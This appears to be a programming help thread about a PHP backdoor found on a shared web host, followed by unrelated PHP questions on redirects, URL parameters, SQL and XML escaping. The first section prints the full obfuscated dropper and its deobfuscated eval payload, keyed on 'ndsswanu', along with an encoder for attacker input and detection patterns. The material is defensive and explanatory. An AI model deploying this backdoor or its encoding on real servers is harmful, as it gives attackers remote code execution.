About a week ago, I noticed there was a seemingly randomly named PHP file that had appeared in the root folder of my shared web hosting. The name of the file is "hvkqwvkj.php" and I very stupidly removed it before I looked at the owner/group and permission information. I'd like to know what this is and how it got there. Here are the contents of that file:
<?php
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns#iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';
$beauregard ='S';$ines='te]ee'; $imogen = 's';
$irene ='("as3:0$r';$grassier ='4';
$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';
$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';
$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].
$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
$bob=$arraigning[3];
$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .
$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .
$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.
$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].
$glutting['0'] .
$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].
$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .
$closest['8'] .$likeness. $contrivance[0].
$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .
$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .
$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .
$equivalently['0'] .
$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.
$appliance .
$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].
$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .
$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .
$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .
$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness );
I was able to parse out the actual coding.
The file employs obscurity to avoid detection. It defines a function and then uses eval to execute it.
Here is the payload (the important bit).
//Take all types of request data and merge them
//This opens up many types of attack vectors
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and record its value if it's set
$a = isset($i["ndsswanu"]) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);
//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
eval(strrev(base64_decode(strrev($a))));
You were correct to remove it immediately; however, this is only a symptom of a greater problem. How the script got there is of much larger concern.
This code would allow an attacker to remotely run any PHP code via a variety of attack vectors.
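Two things a responder usually wants at this point are a way to reproduce the payload encoding the answer describes (so you can recognise it in access logs) and a read-only scan of the rest of the web root for the same family. The following is an added example, not code from the question or the answer above. The indicator patterns are taken from the deobfuscated payload shown above; the threshold for the "fragment assignments" heuristic and the file extensions scanned are assumptions.

```php
<?php
// Added example: indicators for the backdoor family described above, plus a
// read-only scanner you can run from a shared host's shell:
//   php scan.php /path/to/webroot

// 1. How the attacker's request value is built: code -> reversed -> base64 -> reversed.
//    The backdoor undoes it with strrev(base64_decode(strrev($a))).
function encode_payload(string $php): string
{
    return strrev(base64_encode(strrev($php)));
}

function decode_payload(string $blob): string
{
    return strrev(base64_decode(strrev($blob), true) ?: '');
}

// 2. Literal indicators from the deobfuscated payload. Whitespace is allowed
//    between tokens because the dropper varies spacing.
const INDICATORS = [
    'request_merge'   => '/array_merge\s*\(\s*\$_REQUEST\s*,\s*\$_COOKIE\s*,\s*\$_SERVER/i',
    'strrev_eval'     => '/eval\s*\(\s*strrev\s*\(\s*base64_decode\s*\(\s*strrev/i',
    'create_function' => '/create_function\s*\(/i',
    'header_key'      => '/\$i\s*\[\s*["\']HTTP_[A-Z0-9_]+["\']\s*\]/',
];

// 3. Heuristic for the obfuscation layer itself: the dropper is hundreds of
//    `$word = 'x';` assignments with very short string literals. The threshold
//    of 40 is an assumption; tune it against your own code base.
function fragment_assignments(string $src): int
{
    return preg_match_all('/\$[a-z_]+\s*=\s*[\'"][^\'"]{1,10}[\'"]\s*;/i', $src);
}

function scan_source(string $src, string $path = '<string>'): array
{
    $hits = [];
    foreach (INDICATORS as $name => $re) {
        if (preg_match($re, $src)) {
            $hits[] = $name;
        }
    }
    if (fragment_assignments($src) >= 40) {
        $hits[] = 'fragment_assignments';
    }
    return ['path' => $path, 'hits' => $hits];
}

// Walks the tree without modifying anything; returns only files with hits.
function scan_tree(string $root): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $f) {
        if (!$f->isFile() || !preg_match('/\.(php|phtml|php[3-7]|inc)$/i', $f->getFilename())) {
            continue;
        }
        $r = scan_source((string) file_get_contents($f->getPathname()), $f->getPathname());
        if ($r['hits']) {
            $findings[] = $r;
        }
    }
    return $findings;
}

// Constructed sample: the payload stage as it looks once deobfuscated.
$sample = <<<'PHP'
<?php
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
$a = isset($i["ndsswanu"]) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);
eval(strrev(base64_decode(strrev($a))));
PHP;

if (PHP_SAPI === 'cli') {
    // Round trip: this string is what the attacker sends in the ndsswanu
    // parameter, cookie or HTTP header.
    $blob = encode_payload('echo "hi";');
    if (decode_payload($blob) !== 'echo "hi";') {
        throw new RuntimeException('round trip failed');
    }
    echo "wire form of the payload: $blob\n";
    print_r(scan_source($sample, 'constructed-sample'));
    if (isset($argv[1])) {
        print_r(scan_tree($argv[1]));
    }
}
```

The literal indicators only match the payload stage; the dropper as posted in the question contains none of those strings, which is why the fragment-assignment heuristic is there. Expect some false positives from the heuristic on hand-written configuration or language files, so treat a hit as something to read, not something to delete. Copy any suspicious file elsewhere with `cp -p` (preserving owner and timestamps) before touching it, and grep the web server's access logs for `ndsswanu` and for requests to the dropped filename to see how and when it was used.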
Related
I'm setting a variable based on an array. When I echo the variable it displays on the screen, however when I try to add it to a Header Location it doesn't show up in the URL of the next page - everything else does:
$myid = $selected_cat3[0]['id'];
Header("Location:/cat-dashboard/cat-results/?catID=" . $myid
. "&question1=" . $_GET['question1'] . "&question2=" . $_GET['question2']
. "&question3=" . $_GET['question3'] . "&question4=" . $_GET['question4']
. "&question5=" . $_GET['question5'] . "&question6=" . $_GET['question6']
. "&question7=" . $_GET['question7'] . "&question8=" . $_GET['question8']);
This is the generated url:
/cat-dashboard/cat-results/?catID=&question1=0&question2=3&question3=1&question4=1&question5=1&question6=2&question7=1&question8=3
Am I doing something wrong? It doesn't show even if I use: $myid = "1";
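There is no answer to this question on the page, but the way the Location header is assembled is worth showing done safely, because the $_GET values are copied into the URL verbatim. The block below is an added example and not the asker's code: it uses http_build_query() so every value is URL-encoded, accepts only digit strings for the id and the answers, and fails loudly when catID is empty instead of emitting "catID=". The path and parameter names are from the question; the validation rules are an assumption for the example.

```php
<?php
// Added example: build the redirect URL with encoded, validated parameters.

function build_results_url(string $catId, array $get): string
{
    // The id must be a non-empty string of digits; throw rather than redirect
    // with an empty catID as the question's generated URL did.
    if (!preg_match('/^\d+$/', $catId)) {
        throw new InvalidArgumentException('catID missing or not numeric: ' . var_export($catId, true));
    }
    $params = ['catID' => $catId];
    for ($n = 1; $n <= 8; $n++) {
        $key = "question$n";
        $val = (string) ($get[$key] ?? '');
        // Only whole numbers are forwarded; anything else becomes an empty
        // value rather than being copied into the URL as-is.
        $params[$key] = preg_match('/^\d+$/', $val) ? (int) $val : '';
    }
    return '/cat-dashboard/cat-results/?' . http_build_query($params);
}

function redirect_to_results(string $catId, array $get): void
{
    header('Location: ' . build_results_url($catId, $get), true, 303);
    exit; // stop here so nothing else is sent after the redirect
}

// Constructed input; question8 carries an extra "&admin=1" that would have
// become a separate parameter if concatenated raw.
$get = [
    'question1' => '0', 'question2' => '3', 'question3' => '1', 'question4' => '1',
    'question5' => '1', 'question6' => '2', 'question7' => '1', 'question8' => '3&admin=1',
];
echo build_results_url('42', $get), PHP_EOL;
// /cat-dashboard/cat-results/?catID=42&question1=0&question2=3&question3=1&question4=1&question5=1&question6=2&question7=1&question8=
```

On the real page you would call redirect_to_results($selected_cat3[0]['id'], $_GET) before any output is sent; the exception surfaces the empty-id case in the log instead of hiding it in the URL.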
I'm having trouble sending a parameter in the URL of another page. I'm new to coding in PHP so I do not really know how to get this through; I already did some research on this about the $_GET method, but it's still not working.
Code in 1st page:
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</a></td></tr>";
where $temp is the parameter I want to pass to the url.
Code in 2nd page:
$id = $_GET['id'];
$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = $id");
//$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = 10");
The sql query returns error that the $id is null, and the url doesn't display the id.
Do it like this on your html line
echo "<tr><td>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</td></tr>";
I ran your code to see what it output:
// Make some sample data
$row = [
'appl_nric_date' => '9999-99-99',
'applicant_name' => 'some-applicant',
'nric' => 'wtf-is-an-nric',
'application_date' => '8888-99-00'
];
$temp = 'something';
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>"
. $row['appl_nric_date']
. "</td><td>"
. $row['applicant_name']
. "</td><td>"
. $row['nric']
. "</td><td>"
. $row['application_date'] . "</a></td></tr>";
echo PHP_EOL;
This is what it outputs:
<tr><td><a href='application_desktop.php?id='something'>9999-99-99</td><td>some-applicant</td><td>wtf-is-an-nric</td><td>8888-99-00</a></td></tr>
The use of single quotes is not right. Remove the single quote after id=.
Looks like you are not nesting your html elements correctly. You place the opening A tag inside the first TD but then you close that TD without closing the A tag.
To debug this in the browser, the address bar where the URL lives should show the parameters that are sent to the destination page. You can just look at that to verify that it sent what you intended.
In the destination page, you can add the following to debug:
<pre>
<?php print_r($_GET) ?>
</pre>
The above will let you see what you are getting from the first page.
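Neither answer mentions the second page, where $_GET['id'] is interpolated straight into the SQL string. The following is an added example, not code from either answer: the first page emits the link with the id URL-encoded and every cell HTML-escaped, and the second page binds the id as a parameter instead of concatenating it. Table and column names are the ones in the question; mysqli stands in for the removed mysql_* functions, and the host, user, password and database name are placeholders.

```php
<?php
// Added example: escaped link on page 1, prepared statement on page 2.

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Page 1: one table row whose first cell links to application_desktop.php?id=...
function application_row(array $row, string $temp): string
{
    $href = 'application_desktop.php?' . http_build_query(['id' => $temp]);
    return '<tr>'
        . '<td><a href="' . h($href) . '">' . h($row['appl_nric_date']) . '</a></td>'
        . '<td>' . h($row['applicant_name']) . '</td>'
        . '<td>' . h($row['nric']) . '</td>'
        . '<td>' . h($row['application_date']) . '</td>'
        . '</tr>';
}

// Page 2: look the application up with a bound parameter. The value never
// becomes part of the query text, so quotes in it cannot change the query.
function find_application(mysqli $db, string $id): array
{
    $stmt = $db->prepare('SELECT * FROM tblapplication WHERE appl_nric_date = ?');
    $stmt->bind_param('s', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Constructed row and id; the id contains characters that would break both the
// single-quoted href in the question and the concatenated SQL.
$row = [
    'appl_nric_date'   => '2014-01-01',
    'applicant_name'   => 'A & B <Ltd>',
    'nric'             => 'S1234567A',
    'application_date' => '2014-01-02',
];
echo application_row($row, "10' OR '1'='1"), PHP_EOL;
// <tr><td><a href="application_desktop.php?id=10%27+OR+%271%27%3D%271">2014-01-01</a></td><td>A &amp; B &lt;Ltd&gt;</td><td>S1234567A</td><td>2014-01-02</td></tr>

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $db = new mysqli('localhost', 'user', 'password', 'dbname'); // placeholders
    $id = $argv[1]; // on the real page: $_GET['id'] ?? ''
    print_r(find_application($db, $id));
}
```

The `s` type in bind_param is deliberate: appl_nric_date is used as a string in the question, and binding it as a string keeps the comparison exact rather than letting MySQL coerce a partially numeric value.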
I'm trying to send email(s) after submitting a form, I want to achieve:
1) If a field is empty then there is no need to send the table row in the mail. For example, the age field below is optional: the user might add his/her age or might not. So how do I do it in the Swiftmailer $message->addPart('Message','text/html') function?
I tried but it failed with:
Parse error: syntax error, unexpected 'if' (T_IF) in...
The issue is only with if.. without if statement everything works fine.
$content = '<table>
...
<tr><td>' . $_POST["firstname"] . '</td></tr>
' . if(!empty($_POST["age"])) {
. '<tr><td>' . $_POST["age"] . '</td></tr>' .
}
...
</table>';
$message->addPart($content, 'text/html');
Do it outside of the $content variable.
$age = (!empty($_POST["age"])) ? '<tr><td>' . $_POST["age"] . '</td></tr>' : '';
$content = '<table>
...
<tr><td>' . $_POST["firstname"] . '</td></tr>'
. $age . '
...
</table>';
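The answer's ternary solves the parse error, but both the required and the optional $_POST values still go into the text/html part unescaped, so a submitted "</td><script>..." ends up in the mail body as markup. Here is an added example, not the answer's code, that keeps the skip-empty-row behaviour and escapes every field. Field names are from the question; which fields are required and which optional is an assumption.

```php
<?php
// Added example: optional rows plus HTML escaping for the mail body.

function mail_table(array $post, array $required, array $optional): string
{
    $cell = static function (string $v): string {
        return '<tr><td>' . htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td></tr>';
    };
    $rows = '';
    foreach ($required as $field) {
        $rows .= $cell((string) ($post[$field] ?? ''));
    }
    foreach ($optional as $field) {
        $v = (string) ($post[$field] ?? '');
        // Compare against '' rather than using empty(): empty("0") is true,
        // which would silently drop an age of 0 or any other "0" answer.
        if ($v !== '') {
            $rows .= $cell($v);
        }
    }
    return '<table>' . $rows . '</table>';
}

// Constructed submissions: with age, without age, and with markup in a field.
echo mail_table(['firstname' => 'Ann', 'age' => '34'], ['firstname'], ['age']), PHP_EOL;
// <table><tr><td>Ann</td></tr><tr><td>34</td></tr></table>
echo mail_table(['firstname' => 'Bob', 'age' => ''], ['firstname'], ['age']), PHP_EOL;
// <table><tr><td>Bob</td></tr></table>
echo mail_table(['firstname' => '</td><b>Eve</b>'], ['firstname'], ['age']), PHP_EOL;
// <table><tr><td>&lt;/td&gt;&lt;b&gt;Eve&lt;/b&gt;</td></tr></table>

// On the form handler, as in the answer:
// $message->addPart(mail_table($_POST, ['firstname'], ['age']), 'text/html');
```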
I am creating a flight/hotel reservation system like farecompare.com. Farecompare passes values to other sites and creates sessions on those other sites too. Can anyone tell me how they create sessions in it? I can parse the URL but I am not able to create sessions.
public function flight($depart, $return, $from, $to, $type, $class,
$adults, $seniors, $children) {
$dep = explode("/", $depart);
$ret = explode("/", $return);
if ($type == 'RoundTrip') {
$expurl = 'http://www.expedia.co.in/Flights-Search?trip=' .
strtolower($type) . '&leg1=from%3A' . $from .
'%29%2Cto%3A' . $to .
'%29%2Cdeparture%3A' . $dep[1] .
'/'.$dep[0].'/'.$dep[2].
'TANYT&leg2=from%3A' . $to .
'%29%2Cto%3A' . $from .
'%29%2Cdeparture%3A' .
$ret[1].'/'.$ret[0].'/'.$ret[2] .
'TANYT&passengers=children%3A' . $children .
'%2Cadults%3A' . $adults .
'%2Cseniors%3A' . $seniors .
'%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
'%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
echo 'Expedia';
} else {
$type = 'oneway';
$expurl = 'http://www.expedia.co.in/Flights-Search?trip='.
strtolower($type) . '&leg1=from%3A' . $from .
'%29%2Cto%3A' . $to . '%29%2Cdeparture%3A' .
$dep[1].'/'.$dep[0].'/'.$dep[2] .
'TANYT&passengers=children%3A' . $children .
'%2Cadults%3A' . $adults .
'%2Cseniors%3A' . $seniors .
'%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
'%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
echo 'Expedia';
}
}
I worked on Expedia by parsing the URL to get data, but there are other sites like cheapoait, travelocity etc. which use sessions. How do I create sessions?
I would assume they store it in the cookies.
We cannot access the session data of another domain from our site. Data transfer is done using web services (SOAP or REST) in the form of XML. That can be retrieved on the other domain, stored in the session or cookies, and used for calculations on the website.
I have a huge list of stuff for a glossary (about 17 pages' worth) that I have to put into an XML file. So I decided I'd use PHP to make it. My code works, except that where ALL the XML code is, it doesn't show, because the browser is trying to render it. Help?
$arg=explode("\n", $strang);
echo count($arg);
for ($i=0;$i<count($arg);$i=$i+3)
{
echo "<word id='" . $arg[$i+1] . "'>";
echo "<desc>" . $arg[$i] . " - " . $arg[$i+2] . "</desc>";
echo "<pic></pic>";
echo "<audio></audio>";
}
I assume by render it you mean in your browser? If so, you'll need to escape the characters so they will be interpreted literally rather than as markup.
Check out htmlspecialchars and htmlentities
Use a CDATA section:
echo "<desc><![CDATA[" . $arg[$i] . " - " . $arg[$i+2] . "]]></desc>";
If this is your entire script, the fastest way would probably be to swap all of the <'s with &lt;
$arg=explode("\n", $strang);
echo count($arg);
for ($i=0;$i<count($arg);$i=$i+3)
{
echo "&lt;word id='" . $arg[$i+1] . "'>";
echo "&lt;desc>" . $arg[$i] . " - " . $arg[$i+2] . "&lt;/desc>";
echo "&lt;pic>&lt;/pic>";
echo "&lt;audio>&lt;/audio>";
}
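The three answers above each escape one thing: the output for display, the text for XML, or the markup for the browser. If the goal is an XML file, the cleaner option is to let an XML writer do the escaping of text and attribute values, then escape the finished document once only when you want to eyeball it in a browser. The block below is an added example, not code from the question or the answers. It keeps the question's three-lines-per-entry input layout and element names, stops at the last complete entry instead of reading past the end of the array as the original `<=` loop did, and uses constructed input.

```php
<?php
// Added example: build the glossary with XMLWriter so <, >, & and quotes in
// terms, ids and definitions are escaped for you.

function glossary_xml(string $strang): string
{
    $lines = array_map('rtrim', explode("\n", $strang));
    $w = new XMLWriter();
    $w->openMemory();
    $w->setIndent(true);
    $w->startDocument('1.0', 'UTF-8');
    $w->startElement('glossary');
    // Entries are (term, id, definition); only complete triples are emitted.
    for ($i = 0; $i + 2 < count($lines); $i += 3) {
        $w->startElement('word');
        $w->writeAttribute('id', $lines[$i + 1]);                       // quotes and & escaped
        $w->writeElement('desc', $lines[$i] . ' - ' . $lines[$i + 2]);  // <, > and & escaped
        $w->writeElement('pic', '');
        $w->writeElement('audio', '');
        $w->endElement(); // word
    }
    $w->endElement(); // glossary
    $w->endDocument();
    return $w->outputMemory();
}

// Constructed input. The second entry contains "]]>", which a hand-written
// CDATA section cannot hold safely because it terminates the section early;
// XMLWriter escapes it as ordinary text instead.
$strang = "Buffer overflow\nbof\nWriting past the end of a buffer (e.g. a < b)\n"
        . "Injection\ninj&1\nUntrusted data ends a context, like ]]> or </desc>\n";

$xml = glossary_xml($strang);

// Serve it as XML, or as text/plain, and it will not be rendered as HTML:
//   header('Content-Type: application/xml; charset=UTF-8'); echo $xml;
// To show the source inside an HTML page, escape the whole document once:
//   echo '<pre>' . htmlspecialchars($xml, ENT_QUOTES, 'UTF-8') . '</pre>';
echo $xml;
```

Sending the right Content-Type is usually the whole fix for "the browser renders my XML": the markup was never wrong, the page was just declared as text/html.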